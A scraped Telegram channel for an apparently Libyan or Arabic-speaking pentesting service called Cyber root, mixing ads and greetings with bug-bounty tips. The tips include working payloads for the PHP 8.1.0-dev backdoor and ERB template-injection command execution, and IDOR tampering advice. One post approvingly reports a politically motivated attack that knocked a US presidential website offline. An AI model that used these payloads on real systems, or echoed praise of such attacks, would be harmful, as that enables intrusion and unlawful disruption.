Cyber root
69 subscribers
17 photos
1 video
9 links
سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية
Download Telegram
Channel photo updated
سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
2
السلام عليكم
ان شاء الله رمضانكم مبارك
قررت ندير قناه تيلجرام ننشر فيها كل مايتعلق ب الامن السيبراني و الاختراق الاخلاقي للناس المهتمه بلمجال
2
If you find PHP 8.1.0-dev then try RCE & SQLi

User-Agent: zerodiumsleep(5);

User-Agent: zerodiumsystem('id');
When testing APIs, always modify every parameter, even the ones that look irrelevant.

I’ve seen cases where changing a single hidden parameter like:

role=user → role=admin
type=basic → type=premium
user_id=123 → user_id=124
unexpectedly exposed data.
Developers often validate the main parameter but forget secondary ones.

Quick checklist when testing APIs:

• Modify every parameter
• Remove parameters entirely
• Send duplicate parameters
• Change data types (int → string)
• Test IDOR patterns

Sometimes the bug is hiding in the parameter nobody thought to check.

#BugBounty #CyberSecurity #AppSec #Infosec #SecurityResearch
2
الآن هجوم سيبراني يطيح بالموقع الرسمي لدونالد ترامب، رئيس الولايات المتحدة الأمريكية.

الهجوم نفذه مجاهدي المقاومة الاسلامية السيبرانية في العراق "فريق 313" والموقع الآن خارج الخدمة.
https://donaldjtrump.com
#HackerNews
#Cyber_Islamic_Resistance
🔥2
Did you look for SSRF in URL-based parameters?

Archive → grep → test

Try this
👍2
كل عام وانتم بخير
عيدكم مبارك
Critical OS Command injection (RCE)
🔥2
سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع
نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية
https://cyberroot.xo.je
Cyber root pinned «سايبر رووت هي خدمة سيبرانية تقدم فحص شامل للثغرات، اختبار اختراق احترافي، تأمين البيانات وتحسين البنية الأمنية للمواقع نساعد أصحاب المواقع والشركات الصغيرة على حماية منصاتهم من الهجمات و كل الثغرات من خلال تقارير مفصلة وحلول عملية https://cyberroot.xo.je»
Don't forget server-side template injection (SSTI)

RCE via SSTI
I was a testing SSTi And when i tested the payload: <%= 7*7 %>
Give me 49
It means he vuln be SSTI
So i test This payload: <%= system("id") %>
To run command ("id")
And it's worked
Look
A clear RCE via SSTi
2
Remote Code Execution (RCE) via server-side template injection (SSTI)

https://cyberroot.xo.je
🔥2
If anyone need to Pentester
Dm @ls_ly
ان شاء الله جمعتكم مباركه
Remote Code Execution (RCE) via upload files vulnerability
🔥2👎1
لقيت ثغرات حرجه اولها SQL injection و ثم logic business vulnerability تقدر تشري اي منتج ببلاش و ثم XSS و ثغرات اخره فيها injection
هكي يصير لي ميطلبش في مختبر اختراق
تواصل معنا https://cyberroot.xo.je

I found SQL injection on a shop
And i found logic business can by anything for free and found XSS
2
عثرت على ثغره Blind SSRF في موقع او سيرفر تابع ل شركة اتصالات المانيه و حاليا قيد الابلاغ

I discovered a Blind SSRF vulnerability on a website or server belonging to a German telecommunications company and it is currently being reported.
🔥21